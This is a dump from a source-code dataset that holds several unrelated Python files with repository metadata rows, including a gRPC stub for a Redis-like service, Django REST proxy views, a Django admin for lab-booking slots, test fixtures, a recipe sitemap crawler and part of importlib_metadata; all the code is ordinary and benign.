"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import redish_pb2 as redish__pb2
class RedishStub(object):
    """Client-side stub for the redish.Redish service.

    One unary-unary callable is attached per RPC; the request/response
    message types mirror those generated from redish.proto.
    """

    # (rpc name, request message name, response message name)
    _RPCS = (
        ('get', 'Key', 'SingleValue'),
        ('set', 'SetRequest', 'OK'),
        ('dele', 'KeyList', 'IntValue'),
        ('exists', 'KeyList', 'IntValue'),
        ('incr', 'Key', 'IntValue'),
        ('decr', 'Key', 'IntValue'),
        ('incrby', 'KeyIntValue', 'IntValue'),
        ('decrby', 'KeyIntValue', 'IntValue'),
        ('strlen', 'Key', 'IntValue'),
        ('getset', 'KeyValue', 'SingleValue'),
        ('mget', 'KeyList', 'ValueList'),
        ('mset', 'KeyValueList', 'OK'),
        ('type', 'Key', 'SingleValue'),
        ('expire', 'KeyIntValue', 'IntValue'),
        ('pexpire', 'KeyIntValue', 'IntValue'),
        ('expireat', 'KeyIntValue', 'IntValue'),
        ('pexpireat', 'KeyIntValue', 'IntValue'),
        ('persist', 'Key', 'IntValue'),
        ('ttl', 'Key', 'IntValue'),
        ('pttl', 'Key', 'IntValue'),
    )

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Wire up every RPC callable from the spec table above.
        for rpc, req, resp in self._RPCS:
            setattr(self, rpc, channel.unary_unary(
                '/redish.Redish/' + rpc,
                request_serializer=getattr(redish__pb2, req).SerializeToString,
                response_deserializer=getattr(redish__pb2, resp).FromString,
            ))
class RedishServicer(object):
    """Server-side skeleton for the redish.Redish service.

    Every handler marks the call UNIMPLEMENTED and raises; concrete
    servicers override the methods they support.
    Command semantics: https://redis.io/commands
    """

    def _unimplemented(self, context):
        # Shared "not implemented" behaviour for every stubbed RPC.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def get(self, request, context):
        """https://redis.io/commands
        """
        self._unimplemented(context)

    def set(self, request, context):
        self._unimplemented(context)

    def dele(self, request, context):
        """has to be dele not del because python del is a keyword
        """
        self._unimplemented(context)

    def exists(self, request, context):
        self._unimplemented(context)

    def incr(self, request, context):
        self._unimplemented(context)

    def decr(self, request, context):
        self._unimplemented(context)

    def incrby(self, request, context):
        self._unimplemented(context)

    def decrby(self, request, context):
        self._unimplemented(context)

    def strlen(self, request, context):
        self._unimplemented(context)

    def getset(self, request, context):
        self._unimplemented(context)

    def mget(self, request, context):
        self._unimplemented(context)

    def mset(self, request, context):
        self._unimplemented(context)

    def type(self, request, context):
        self._unimplemented(context)

    def expire(self, request, context):
        self._unimplemented(context)

    def pexpire(self, request, context):
        self._unimplemented(context)

    def expireat(self, request, context):
        self._unimplemented(context)

    def pexpireat(self, request, context):
        self._unimplemented(context)

    def persist(self, request, context):
        self._unimplemented(context)

    def ttl(self, request, context):
        self._unimplemented(context)

    def pttl(self, request, context):
        self._unimplemented(context)
def add_RedishServicer_to_server(servicer, server):
    """Register all redish.Redish RPC handlers from *servicer* on *server*."""
    # (rpc name, request message name, response message name)
    specs = (
        ('get', 'Key', 'SingleValue'),
        ('set', 'SetRequest', 'OK'),
        ('dele', 'KeyList', 'IntValue'),
        ('exists', 'KeyList', 'IntValue'),
        ('incr', 'Key', 'IntValue'),
        ('decr', 'Key', 'IntValue'),
        ('incrby', 'KeyIntValue', 'IntValue'),
        ('decrby', 'KeyIntValue', 'IntValue'),
        ('strlen', 'Key', 'IntValue'),
        ('getset', 'KeyValue', 'SingleValue'),
        ('mget', 'KeyList', 'ValueList'),
        ('mset', 'KeyValueList', 'OK'),
        ('type', 'Key', 'SingleValue'),
        ('expire', 'KeyIntValue', 'IntValue'),
        ('pexpire', 'KeyIntValue', 'IntValue'),
        ('expireat', 'KeyIntValue', 'IntValue'),
        ('pexpireat', 'KeyIntValue', 'IntValue'),
        ('persist', 'Key', 'IntValue'),
        ('ttl', 'Key', 'IntValue'),
        ('pttl', 'Key', 'IntValue'),
    )
    rpc_method_handlers = {
        rpc: grpc.unary_unary_rpc_method_handler(
            getattr(servicer, rpc),
            request_deserializer=getattr(redish__pb2, req).FromString,
            response_serializer=getattr(redish__pb2, resp).SerializeToString,
        )
        for rpc, req, resp in specs
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'redish.Redish', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
| 39.456757
| 72
| 0.722447
|
794b277ae34addcd956bb2c9cc870a95e6a8c990
| 3,073
|
py
|
Python
|
setup.py
|
JaphetSamuel/django-mobile
|
17ebc0ed01f5495c4087633336bd9cf5276de793
|
[
"BSD-3-Clause"
] | 254
|
2015-01-09T23:39:22.000Z
|
2021-11-22T17:47:34.000Z
|
setup.py
|
JaphetSamuel/django-mobile
|
17ebc0ed01f5495c4087633336bd9cf5276de793
|
[
"BSD-3-Clause"
] | 40
|
2015-02-06T00:09:56.000Z
|
2020-12-20T03:38:25.000Z
|
setup.py
|
JaphetSamuel/django-mobile
|
17ebc0ed01f5495c4087633336bd9cf5276de793
|
[
"BSD-3-Clause"
] | 106
|
2015-01-16T08:52:34.000Z
|
2022-03-08T00:51:58.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
# Absolute paths to the files concatenated into the PyPI long_description.
README_PATH = os.path.join(os.path.dirname(__file__), 'README.rst')
CHANGES_PATH = os.path.join(os.path.dirname(__file__), 'CHANGES.rst')
def readfile(filename):
    """Return the contents of *filename* as text.

    On Python 3 the file is decoded as UTF-8; on Python 2 the raw byte
    string is returned, matching the original behaviour. The handle is
    closed deterministically via a context manager (the original left
    the file open for the garbage collector to reap).
    """
    if sys.version_info[0] >= 3:
        with open(filename, 'r', encoding='utf-8') as fh:
            return fh.read()
    with open(filename, 'r') as fh:
        return fh.read()
def get_author(package):
    """
    Return the package author as listed in `__author__` in `init.py`.
    """
    # Accepts both `__author__ = 'x'` and the Python 2 `u'x'` spelling.
    init_py = readfile(os.path.join(package, '__init__.py'))
    author = re.search("__author__ = u?['\"]([^'\"]+)['\"]", init_py).group(1)
    return UltraMagicString(author)
def get_version(package):
    """
    Return package version as listed in `__version__` in `init.py`.
    """
    source = readfile(os.path.join(package, '__init__.py'))
    match = re.search("__version__ = ['\"]([^'\"]+)['\"]", source)
    return match.group(1)
class UltraMagicString(object):
    '''
    String-like wrapper that lets unicode package metadata survive
    distutils on Python 2. Taken from
    http://stackoverflow.com/questions/1162338/whats-the-right-way-to-use-unicode-metadata-in-setup-py
    '''

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return self.value

    def __unicode__(self):
        # Only ever invoked on Python 2, where self.value is a byte string.
        return self.value.decode('UTF-8')

    def __add__(self, other):
        combined = self.value + str(other)
        return UltraMagicString(combined)

    def split(self, *args, **kw):
        # Delegate so distutils can treat this like a plain string.
        return self.value.split(*args, **kw)
# Assemble the PyPI long_description from README + CHANGES.
# Python 3: readfile() already returns decoded text.
# Python 2: the raw byte strings must be decoded, re-encoded, and wrapped
# in UltraMagicString so distutils tolerates unicode metadata.
if sys.version_info[0] >= 3:
    long_description = u'\n\n'.join((
        readfile(README_PATH),
        readfile(CHANGES_PATH),
    ))
else:
    long_description = u'\n\n'.join((
        readfile(README_PATH).decode('utf-8'),
        readfile(CHANGES_PATH).decode('utf-8'),
    ))
    long_description = long_description.encode('utf-8')
    long_description = UltraMagicString(long_description)

# Package metadata; executes at import time, as is conventional for setup.py.
setup(
    name='django-mobile',
    version=get_version('django_mobile'),
    url='https://github.com/gregmuellegger/django-mobile',
    license='BSD',
    description=u'Detect mobile browsers and serve different template flavours to them.',
    long_description=long_description,
    author=get_author('django_mobile'),
    author_email='gregor@muellegger.de',
    keywords='django,mobile',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.3",
        "Topic :: Internet :: WWW/HTTP",
        "Topic :: Internet :: WWW/HTTP :: Dynamic Content",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
    packages=[
        'django_mobile',
        'django_mobile.cache',
    ],
    tests_require=['Django', 'mock'],
    test_suite='django_mobile_tests.runtests.runtests',
)
| 29.548077
| 102
| 0.631305
|
794b27fbfb7877bad7a6f48828244e7cf0f12306
| 3,895
|
py
|
Python
|
spook/views.py
|
pablo-moreno/django_spook
|
0d63628abbd530ac5b31f7abb4845fef500bdfb1
|
[
"MIT"
] | 2
|
2021-05-18T14:24:27.000Z
|
2021-06-09T10:47:32.000Z
|
spook/views.py
|
pablo-moreno/django_spook
|
0d63628abbd530ac5b31f7abb4845fef500bdfb1
|
[
"MIT"
] | 4
|
2020-09-28T19:23:09.000Z
|
2021-11-17T16:26:51.000Z
|
spook/views.py
|
pablo-moreno/django_spook
|
0d63628abbd530ac5b31f7abb4845fef500bdfb1
|
[
"MIT"
] | null | null | null |
from typing import Type
from rest_framework.generics import (
ListAPIView,
RetrieveAPIView,
CreateAPIView,
UpdateAPIView,
DestroyAPIView,
)
from rest_framework.response import Response
from .resources import APIResource
from .validators import InputValidator
class APIResourceMixin(object):
    """Shared plumbing for views that forward HTTP verbs to an APIResource."""

    # Concrete views point this at the APIResource subclass to proxy to.
    resource: Type[APIResource] = None

    def get_token(self, request):
        # Subclasses decide how to extract the upstream auth token.
        raise NotImplementedError

    def get_resource(self):
        """Return the configured resource class, failing loudly when unset."""
        if not self.resource:
            raise Exception(
                "You have to specify the service property or override .get_resource() function"
            )
        return self.resource

    def get_validator(self):
        """Return an InputValidator subclass bound to this view's serializer."""
        serializer_cls = self.get_serializer_class()

        class Validator(InputValidator):
            serializer_class = serializer_cls

        return Validator
class APIResourceListView(ListAPIView, APIResourceMixin):
    """GET on the collection -> APIResource.list(**query_params)."""

    def list(self, request, *args, **kwargs):
        client = self.get_resource()(
            token=self.get_token(request),
            validator=self.get_validator(),
            context={"request": request},
        )
        upstream = client.list(**request.query_params)
        return Response(data=upstream.data, status=upstream.status)
class APIResourceRetrieveView(RetrieveAPIView, APIResourceMixin):
    """GET on a single object -> APIResource.retrieve(pk, **query_params)."""

    def retrieve(self, request, *args, **kwargs):
        pk = kwargs.get(self.lookup_field)
        client = self.get_resource()(
            token=self.get_token(request),
            validator=self.get_validator(),
            context={"request": request},
        )
        upstream = client.retrieve(pk, **request.query_params)
        return Response(data=upstream.data, status=upstream.status)
class APIResourceCreateView(CreateAPIView, APIResourceMixin):
    """POST on the collection -> APIResource.create(data, query)."""

    def create(self, request, *args, **kwargs):
        client = self.get_resource()(
            token=self.get_token(request),
            validator=self.get_validator(),
            context={"request": request},
        )
        upstream = client.create(data=request.data, query=request.query_params)
        return Response(data=upstream.data, status=upstream.status)
class APIResourcePutView(UpdateAPIView, APIResourceMixin):
    """PUT/PATCH on a single object -> APIResource.update(...)."""

    def update(self, request, *args, **kwargs):
        # DRF signals PATCH by injecting partial=True into kwargs.
        partial = kwargs.pop("partial", False)
        pk = kwargs.get(self.lookup_field)
        client = self.get_resource()(
            token=self.get_token(request),
            validator=self.get_validator(),
            context={"request": request},
        )
        upstream = client.update(
            pk=pk, data=request.data, query=request.query_params, partial=partial
        )
        return Response(data=upstream.data, status=upstream.status)
class APIResourceDestroyView(DestroyAPIView, APIResourceMixin):
    """Delete endpoint that delegates removal to the configured resource."""

    def destroy(self, request, *args, **kwargs):
        """Proxy DELETE requests for the object keyed by ``lookup_field``."""
        lookup_value = kwargs.get(self.lookup_field)
        client = self.get_resource()(
            token=self.get_token(request),
            validator=self.get_validator(),
            context={"request": request},
        )
        result = client.delete(pk=lookup_value, query=request.query_params)
        return Response(data=result.data, status=result.status)
class APIResourceRetrieveUpdateView(APIResourceRetrieveView, APIResourcePutView):
    """Combined GET-detail + PUT/PATCH endpoint for a single resource object."""

    pass
class APIResourceRetrieveUpdateDestroyView(
    APIResourceRetrieveUpdateView, APIResourceDestroyView
):
    """Combined GET-detail + PUT/PATCH + DELETE endpoint for one object."""

    pass
class APIResourceListCreateView(APIResourceListView, APIResourceCreateView):
    """Combined GET-list + POST-create endpoint."""

    pass
| 30.912698
| 96
| 0.644159
|
794b28159699b608333e89ada169a4226dcf2eb2
| 5,132
|
py
|
Python
|
tests/checkpoint/conftest.py
|
arunnthevapalan/great_expectations
|
97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1
|
[
"Apache-2.0"
] | 1
|
2022-03-17T08:05:44.000Z
|
2022-03-17T08:05:44.000Z
|
tests/checkpoint/conftest.py
|
arunnthevapalan/great_expectations
|
97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1
|
[
"Apache-2.0"
] | null | null | null |
tests/checkpoint/conftest.py
|
arunnthevapalan/great_expectations
|
97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1
|
[
"Apache-2.0"
] | null | null | null |
import os
import shutil
import pytest
from great_expectations import DataContext
from great_expectations.core import ExpectationConfiguration
from great_expectations.data_context.util import file_relative_path
@pytest.fixture
def titanic_pandas_data_context_stats_enabled_and_expectation_suite_with_one_expectation(
    titanic_pandas_data_context_with_v013_datasource_with_checkpoints_v1_with_empty_store_stats_enabled,
):
    # Extends the titanic pandas DataContext fixture with one saved suite
    # ("my_expectation_suite") containing a single
    # expect_column_values_to_be_between expectation on column "col1".
    context: DataContext = titanic_pandas_data_context_with_v013_datasource_with_checkpoints_v1_with_empty_store_stats_enabled
    # create expectation suite
    suite = context.create_expectation_suite("my_expectation_suite")
    expectation = ExpectationConfiguration(
        expectation_type="expect_column_values_to_be_between",
        kwargs={"column": "col1", "min_value": 1, "max_value": 2},
    )
    # NOTE Will 20211208 _add_expectation() method, although being called by an ExpectationSuite instance, is being
    # called within a fixture, and so will call the private method _add_expectation() and prevent it from sending a
    # usage_event.
    suite._add_expectation(expectation, send_usage_event=False)
    context.save_expectation_suite(suite)
    return context
@pytest.fixture
def titanic_spark_data_context_with_v013_datasource_with_checkpoints_v1_with_empty_store_stats_enabled(
    tmp_path_factory,
    monkeypatch,
    spark_session,
):
    # Builds a throwaway great_expectations project directory containing a
    # Spark Datasource configured over four copies of the Titanic CSV
    # (two timestamped, one of them without a .csv extension, plus two
    # year-named copies) so the various data connectors below have data.
    # Re-enable GE_USAGE_STATS
    monkeypatch.delenv("GE_USAGE_STATS")
    project_path: str = str(tmp_path_factory.mktemp("titanic_data_context"))
    context_path: str = os.path.join(project_path, "great_expectations")
    os.makedirs(os.path.join(context_path, "expectations"), exist_ok=True)
    data_path: str = os.path.join(context_path, "..", "data", "titanic")
    os.makedirs(os.path.join(data_path), exist_ok=True)
    shutil.copy(
        file_relative_path(
            __file__,
            os.path.join(
                "..",
                "test_fixtures",
                "great_expectations_v013_no_datasource_stats_enabled.yml",
            ),
        ),
        str(os.path.join(context_path, "great_expectations.yml")),
    )
    shutil.copy(
        file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
        str(
            os.path.join(
                context_path, "..", "data", "titanic", "Titanic_19120414_1313.csv"
            )
        ),
    )
    # Same file again, deliberately without the .csv extension — exercises the
    # glob_directive / default_regex filtering of the connectors below.
    shutil.copy(
        file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
        str(
            os.path.join(context_path, "..", "data", "titanic", "Titanic_19120414_1313")
        ),
    )
    shutil.copy(
        file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
        str(os.path.join(context_path, "..", "data", "titanic", "Titanic_1911.csv")),
    )
    shutil.copy(
        file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
        str(os.path.join(context_path, "..", "data", "titanic", "Titanic_1912.csv")),
    )
    context: DataContext = DataContext(context_root_dir=context_path)
    assert context.root_directory == context_path
    # Inline YAML for a Spark datasource with one inferred, two configured and
    # one runtime data connector, all rooted at data_path.
    datasource_config: str = f"""
    class_name: Datasource
    execution_engine:
        class_name: SparkDFExecutionEngine
    data_connectors:
        my_basic_data_connector:
            class_name: InferredAssetFilesystemDataConnector
            base_directory: {data_path}
            default_regex:
                pattern: (.*)\\.csv
                group_names:
                    - data_asset_name
        my_special_data_connector:
            class_name: ConfiguredAssetFilesystemDataConnector
            base_directory: {data_path}
            glob_directive: "*.csv"
            default_regex:
                pattern: (.+)\\.csv
                group_names:
                    - name
            assets:
                users:
                    base_directory: {data_path}
                    pattern: (.+)_(\\d+)_(\\d+)\\.csv
                    group_names:
                        - name
                        - timestamp
                        - size
        my_other_data_connector:
            class_name: ConfiguredAssetFilesystemDataConnector
            base_directory: {data_path}
            glob_directive: "*.csv"
            default_regex:
                pattern: (.+)\\.csv
                group_names:
                    - name
            assets:
                users: {{}}
        my_runtime_data_connector:
            module_name: great_expectations.datasource.data_connector
            class_name: RuntimeDataConnector
            batch_identifiers:
                - pipeline_stage_name
                - airflow_run_id
    """
    # noinspection PyUnusedLocal
    context.test_yaml_config(
        name="my_datasource", yaml_config=datasource_config, pretty_print=False
    )
    # noinspection PyProtectedMember
    context._save_project_config()
    return context
| 36.397163
| 126
| 0.616329
|
794b28f6197c31aceca25bee0681f8e8ee7a6fb7
| 225
|
py
|
Python
|
tests/edge_walk/auto_gen/data/const.py
|
muzudho/state-machine-py
|
f8f442c88fcc16db07960ffccc5e466bf20d9a11
|
[
"MIT"
] | null | null | null |
tests/edge_walk/auto_gen/data/const.py
|
muzudho/state-machine-py
|
f8f442c88fcc16db07960ffccc5e466bf20d9a11
|
[
"MIT"
] | null | null | null |
tests/edge_walk/auto_gen/data/const.py
|
muzudho/state-machine-py
|
f8f442c88fcc16db07960ffccc5e466bf20d9a11
|
[
"MIT"
] | null | null | null |
# Machine identifier for the auto-generated "edge walk" test data.
MACHINE_A = 'MachineA'
# State names.
INIT = 'Init'
THIS = 'This'
IS = 'Is'
A = 'A'
GOAL = 'Goal'
# Edge (transition) names; E_LOOPBACK is the empty-string loopback edge.
E_LOOPBACK = ''
E_THAT = 'that'
E_THIS = 'this'
E_WAS = 'was'
E_IS = 'is'
E_AN = 'an'
E_A = 'a'
E_PIN = 'pin'
E_PEN = 'pen'
E_RETRY = 'retry'
| 13.235294
| 22
| 0.573333
|
794b290e7e3fd9f574ccdd3b0646eab09e7158b8
| 1,530
|
py
|
Python
|
recipes/site_listers/bonappetit.py
|
cfeenstra67/recipes
|
a2d296500b4ff70e11ff3177a1092a033498f82a
|
[
"MIT"
] | null | null | null |
recipes/site_listers/bonappetit.py
|
cfeenstra67/recipes
|
a2d296500b4ff70e11ff3177a1092a033498f82a
|
[
"MIT"
] | null | null | null |
recipes/site_listers/bonappetit.py
|
cfeenstra67/recipes
|
a2d296500b4ff70e11ff3177a1092a033498f82a
|
[
"MIT"
] | null | null | null |
import logging
import re
from typing import Iterator
from urllib.parse import urljoin, urlparse
import scrapy
from lxml import etree
from recipes.site_listers.base import PageCallback, SiteLister
LOGGER = logging.getLogger(__name__)
class BonAppetitLister(SiteLister):
    """Lister that walks bonappetit.com's sitemap index for recipe pages."""

    start_url = "https://www.bonappetit.com/sitemap.xml"
    recipe_url_regex = re.compile(r"^/recipe/.+$")

    def start_requests(self, page_callback: PageCallback) -> Iterator[scrapy.Request]:
        ns = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}

        def handle_leaf_sitemap(response: scrapy.http.Response):
            # Keep only <url><loc> entries whose path looks like a recipe.
            doc = etree.fromstring(response.body)
            for loc in doc.findall(".//sm:url/sm:loc", namespaces=ns):
                absolute = urljoin(response.url, loc.text)
                if self.recipe_url_regex.search(urlparse(absolute).path):
                    yield scrapy.Request(absolute, callback=page_callback)

        def handle_sitemap_index(response: scrapy.http.Response):
            # The top-level sitemap is an index of per-section sitemaps.
            doc = etree.fromstring(response.body)
            for loc in doc.findall(".//sm:sitemap/sm:loc", namespaces=ns):
                yield scrapy.Request(
                    urljoin(response.url, loc.text),
                    callback=handle_leaf_sitemap,
                    dont_filter=True,
                )

        yield scrapy.Request(self.start_url, callback=handle_sitemap_index, dont_filter=True)
| 34
| 88
| 0.64902
|
794b298d1de13fea56b8459ae3eb0285035d6ea0
| 4,175
|
py
|
Python
|
server/booking_portal/admin/slot.py
|
ujjwal-raizada/lab-booking-system
|
4eed0941104d635d90ed74d31f30e2698474a9ea
|
[
"MIT"
] | null | null | null |
server/booking_portal/admin/slot.py
|
ujjwal-raizada/lab-booking-system
|
4eed0941104d635d90ed74d31f30e2698474a9ea
|
[
"MIT"
] | 5
|
2020-02-02T15:41:48.000Z
|
2020-12-15T08:43:25.000Z
|
server/booking_portal/admin/slot.py
|
ujjwal-raizada/lab-booking-system
|
4eed0941104d635d90ed74d31f30e2698474a9ea
|
[
"MIT"
] | 5
|
2020-01-10T16:29:15.000Z
|
2022-01-07T05:30:19.000Z
|
import datetime
from django.contrib import admin, messages
from django.contrib.auth.decorators import user_passes_test
from django.shortcuts import redirect, render
from django.urls import path
from django.utils.translation import gettext_lazy
from rangefilter.filter import DateRangeFilter
from .. import permissions
from ..forms.admin import BulkCreateSlotsForm
from ..models import Instrument, Slot
class SlotFilterByInstrument(admin.SimpleListFilter):
    """Admin sidebar filter narrowing Slots to a single Instrument."""

    # Name to be displayed on the admin portal
    title = gettext_lazy("Instrument")
    parameter_name = 'instrument'

    def lookups(self, request, model_admin):
        """Yield ``(query-value, display-label)`` pairs, one per Instrument.

        The first element in each pair is the coded value used in the URL
        query string; the second is the human-readable sidebar label.
        """
        return (
            (instrument.id, gettext_lazy(str(instrument)))
            for instrument in Instrument.objects.all()
        )

    def queryset(self, request, queryset):
        """Filter by the selected instrument id, or pass through when unset."""
        selected = self.value()
        if selected is None:
            return queryset
        return queryset.filter(instrument__id=selected)
class SlotAdmin(admin.ModelAdmin):
    """Admin for Slot with date/status/instrument filters and a bulk-create view."""

    change_list_template = "admin/slot_change_list.html"
    list_filter = (
        ('date', DateRangeFilter),
        'status',
        SlotFilterByInstrument
    )
    list_display = admin.ModelAdmin.list_display + ('status',)

    # 'Add Slot' button is only visible to the admin
    def has_add_permission(self, request):
        # Simplified from an if/return-True/return-False chain.
        return bool(request.user.is_superuser)

    @staticmethod
    def time_left(current, end, duration):
        """Checks if a slot can be made with `current time` and
        `duration` before the `end time`"""
        today = datetime.date.today()
        # Times are combined with an arbitrary date so they can be subtracted.
        diff = (datetime.datetime.combine(today, end) -
                datetime.datetime.combine(today, current))
        return diff >= duration

    def get_urls(self):
        """Prepend the bulk-slot-creation URL to the default admin URLs."""
        urls = super().get_urls()
        info = self.model._meta.app_label, self.model._meta.model_name
        my_urls = [
            path("bulk-slots/", SlotAdmin.generate_slots, name='%s_%s_bulk-slots_create' % info)
        ]
        return my_urls + urls

    @staticmethod
    def render_bulk_slots_form(request, form):
        """Render the bulk-import template with the given (possibly bound) form."""
        payload = {
            "form": form,
            "opts": Slot._meta,
            "has_view_permission": True,
        }
        return render(request, "admin/bulk_import_slots_form.html", payload)

    @staticmethod
    @user_passes_test(lambda u: permissions.is_lab_assistant(u) or u.is_superuser)
    def generate_slots(request):
        """Bulk Import Slots has a form for creating slots.
        This form is restricted to staff.
        """
        if request.method == 'POST':
            form = BulkCreateSlotsForm(request.POST)
            if not form.is_valid():
                return SlotAdmin.render_bulk_slots_form(request, form)
            instr = form.cleaned_data['instrument']
            start_date = form.cleaned_data['start_date']
            start_time = form.cleaned_data['start_time']
            end_time = form.cleaned_data['end_time']
            duration = form.cleaned_data['slot_duration']
            day_count = int(form.cleaned_data['for_the_next'])
            total, created = Slot.objects.bulk_create_slots(instr, start_date, start_time, end_time, duration,
                                                            day_count)
            # Warn (rather than fail) when some slots clashed with existing ones.
            if total == created:
                messages.success(request, "All slots were created successfully.")
            else:
                messages.warning(request, f"{created} out of {total} slots created. Some slots may not have been created"
                                 f" due to clashes with existing slots.")
            return redirect("..")
        else:
            form = BulkCreateSlotsForm()
            return SlotAdmin.render_bulk_slots_form(request, form)
| 35.683761
| 121
| 0.631138
|
794b29abeaea6270c86e717d785cbd7e129be793
| 14,746
|
py
|
Python
|
venv/lib/python3.7/site-packages/importlib_metadata/__init__.py
|
melyxlin/sailor-moon-api
|
cb665a15fb5f13632773a0049cf18fec783a1fcd
|
[
"MIT"
] | 6
|
2019-09-02T02:44:44.000Z
|
2020-06-22T12:04:02.000Z
|
venv/lib/python3.7/site-packages/importlib_metadata/__init__.py
|
melyxlin/sailor-moon-api
|
cb665a15fb5f13632773a0049cf18fec783a1fcd
|
[
"MIT"
] | 2
|
2019-12-26T17:31:57.000Z
|
2020-01-06T19:45:26.000Z
|
venv/lib/python3.7/site-packages/importlib_metadata/__init__.py
|
melyxlin/sailor-moon-api
|
cb665a15fb5f13632773a0049cf18fec783a1fcd
|
[
"MIT"
] | 1
|
2019-08-20T18:11:48.000Z
|
2019-08-20T18:11:48.000Z
|
from __future__ import unicode_literals, absolute_import
import io
import os
import re
import abc
import csv
import sys
import zipp
import operator
import functools
import itertools
import collections
from ._compat import (
install,
NullFinder,
ConfigParser,
suppress,
map,
FileNotFoundError,
IsADirectoryError,
NotADirectoryError,
PermissionError,
pathlib,
PYPY_OPEN_BUG,
ModuleNotFoundError,
MetaPathFinder,
email_message_from_string,
)
from importlib import import_module
from itertools import starmap
# Python 2 compatibility: make all classes defined below new-style.
__metaclass__ = type

# Explicit public API of the package.
__all__ = [
    'Distribution',
    'PackageNotFoundError',
    'distribution',
    'distributions',
    'entry_points',
    'files',
    'metadata',
    'requires',
    'version',
]
# Raised by Distribution.from_name() when no resolver yields a distribution.
class PackageNotFoundError(ModuleNotFoundError):
    """The package was not found."""
class EntryPoint(collections.namedtuple('EntryPointBase', 'name value group')):
    """An entry point as defined by Python packaging conventions.

    See `the packaging docs on entry points
    <https://packaging.python.org/specifications/entry-points/>`_
    for more information.
    """

    pattern = re.compile(
        r'(?P<module>[\w.]+)\s*'
        r'(:\s*(?P<attr>[\w.]+))?\s*'
        r'(?P<extras>\[.*\])?\s*$'
    )
    """
    A regular expression describing the syntax for an entry point,
    which might look like:

        - module
        - package.module
        - package.module:attribute
        - package.module:object.attribute
        - package.module:attr [extra1, extra2]

    Other combinations are possible as well.

    The expression is lenient about whitespace around the ':',
    following the attr, and following any extras.
    """

    def load(self):
        """Load the entry point from its definition. If only a module
        is indicated by the value, return that module. Otherwise,
        return the named object.
        """
        match = self.pattern.match(self.value)
        module = import_module(match.group('module'))
        # Walk the dotted attribute path (if any) down from the module.
        attrs = filter(None, (match.group('attr') or '').split('.'))
        return functools.reduce(getattr, attrs, module)

    @property
    def extras(self):
        """Return the extras declared by this entry point, as strings.

        Fix: previously returned ``re.Match`` objects (``re.finditer``);
        callers expect the plain extra names.
        """
        match = self.pattern.match(self.value)
        return re.findall(r'\w+', match.group('extras') or '')

    @classmethod
    def _from_config(cls, config):
        """Build EntryPoints from a parsed entry_points.txt ConfigParser."""
        return [
            cls(name, value, group)
            for group in config.sections()
            for name, value in config.items(group)
        ]

    @classmethod
    def _from_text(cls, text):
        """Parse entry_points.txt text (ini format) into EntryPoints."""
        config = ConfigParser(delimiters='=')
        # case sensitive: https://stackoverflow.com/q/1611799/812183
        config.optionxform = str
        try:
            config.read_string(text)
        except AttributeError:  # pragma: nocover
            # Python 2 has no read_string
            config.readfp(io.StringIO(text))
        return EntryPoint._from_config(config)

    def __iter__(self):
        """
        Supply iter so one may construct dicts of EntryPoints easily.
        """
        return iter((self.name, self))
class PackagePath(pathlib.PurePosixPath):
    """A reference to a path in a package"""

    def read_text(self, encoding='utf-8'):
        """Return the file's decoded contents."""
        with self.locate().open(encoding=encoding) as handle:
            return handle.read()

    def read_binary(self):
        """Return the file's raw bytes."""
        with self.locate().open('rb') as handle:
            return handle.read()

    def locate(self):
        """Return a path-like object for this path"""
        # self.dist is attached when the path is built by Distribution.files.
        return self.dist.locate_file(self)
class FileHash:
    """A parsed ``mode=value`` hash specification (as found in RECORD files)."""

    def __init__(self, spec):
        # Split on the first '=' only; the value may itself contain '='.
        self.mode, _, self.value = spec.partition('=')

    def __repr__(self):
        return '<FileHash mode: %s value: %s>' % (self.mode, self.value)
class Distribution:
    """A Python distribution package."""

    @abc.abstractmethod
    def read_text(self, filename):
        """Attempt to load metadata file given by the name.

        :param filename: The name of the file in the distribution info.
        :return: The text if found, otherwise None.
        """

    @abc.abstractmethod
    def locate_file(self, path):
        """
        Given a path to a file in this distribution, return a path
        to it.
        """

    @classmethod
    def from_name(cls, name):
        """Return the Distribution for the given package name.

        :param name: The name of the distribution package to search for.
        :return: The Distribution instance (or subclass thereof) for the named
            package, if found.
        :raises PackageNotFoundError: When the named package's distribution
            metadata cannot be found.
        """
        # First resolver on sys.meta_path that yields a distribution wins;
        # the for/else raises only when every resolver came up empty.
        for resolver in cls._discover_resolvers():
            dists = resolver(name)
            dist = next(dists, None)
            if dist is not None:
                return dist
        else:
            raise PackageNotFoundError(name)

    @classmethod
    def discover(cls):
        """Return an iterable of Distribution objects for all packages.

        :return: Iterable of Distribution objects for all packages.
        """
        return itertools.chain.from_iterable(
            resolver()
            for resolver in cls._discover_resolvers()
        )

    @staticmethod
    def _discover_resolvers():
        """Search the meta_path for resolvers."""
        # Only finders that expose find_distributions() participate.
        declared = (
            getattr(finder, 'find_distributions', None)
            for finder in sys.meta_path
        )
        return filter(None, declared)

    @property
    def metadata(self):
        """Return the parsed metadata for this Distribution.

        The returned object will have keys that name the various bits of
        metadata.  See PEP 566 for details.
        """
        text = (
            self.read_text('METADATA')
            or self.read_text('PKG-INFO')
            # This last clause is here to support old egg-info files.  Its
            # effect is to just end up using the PathDistribution's self._path
            # (which points to the egg-info file) attribute unchanged.
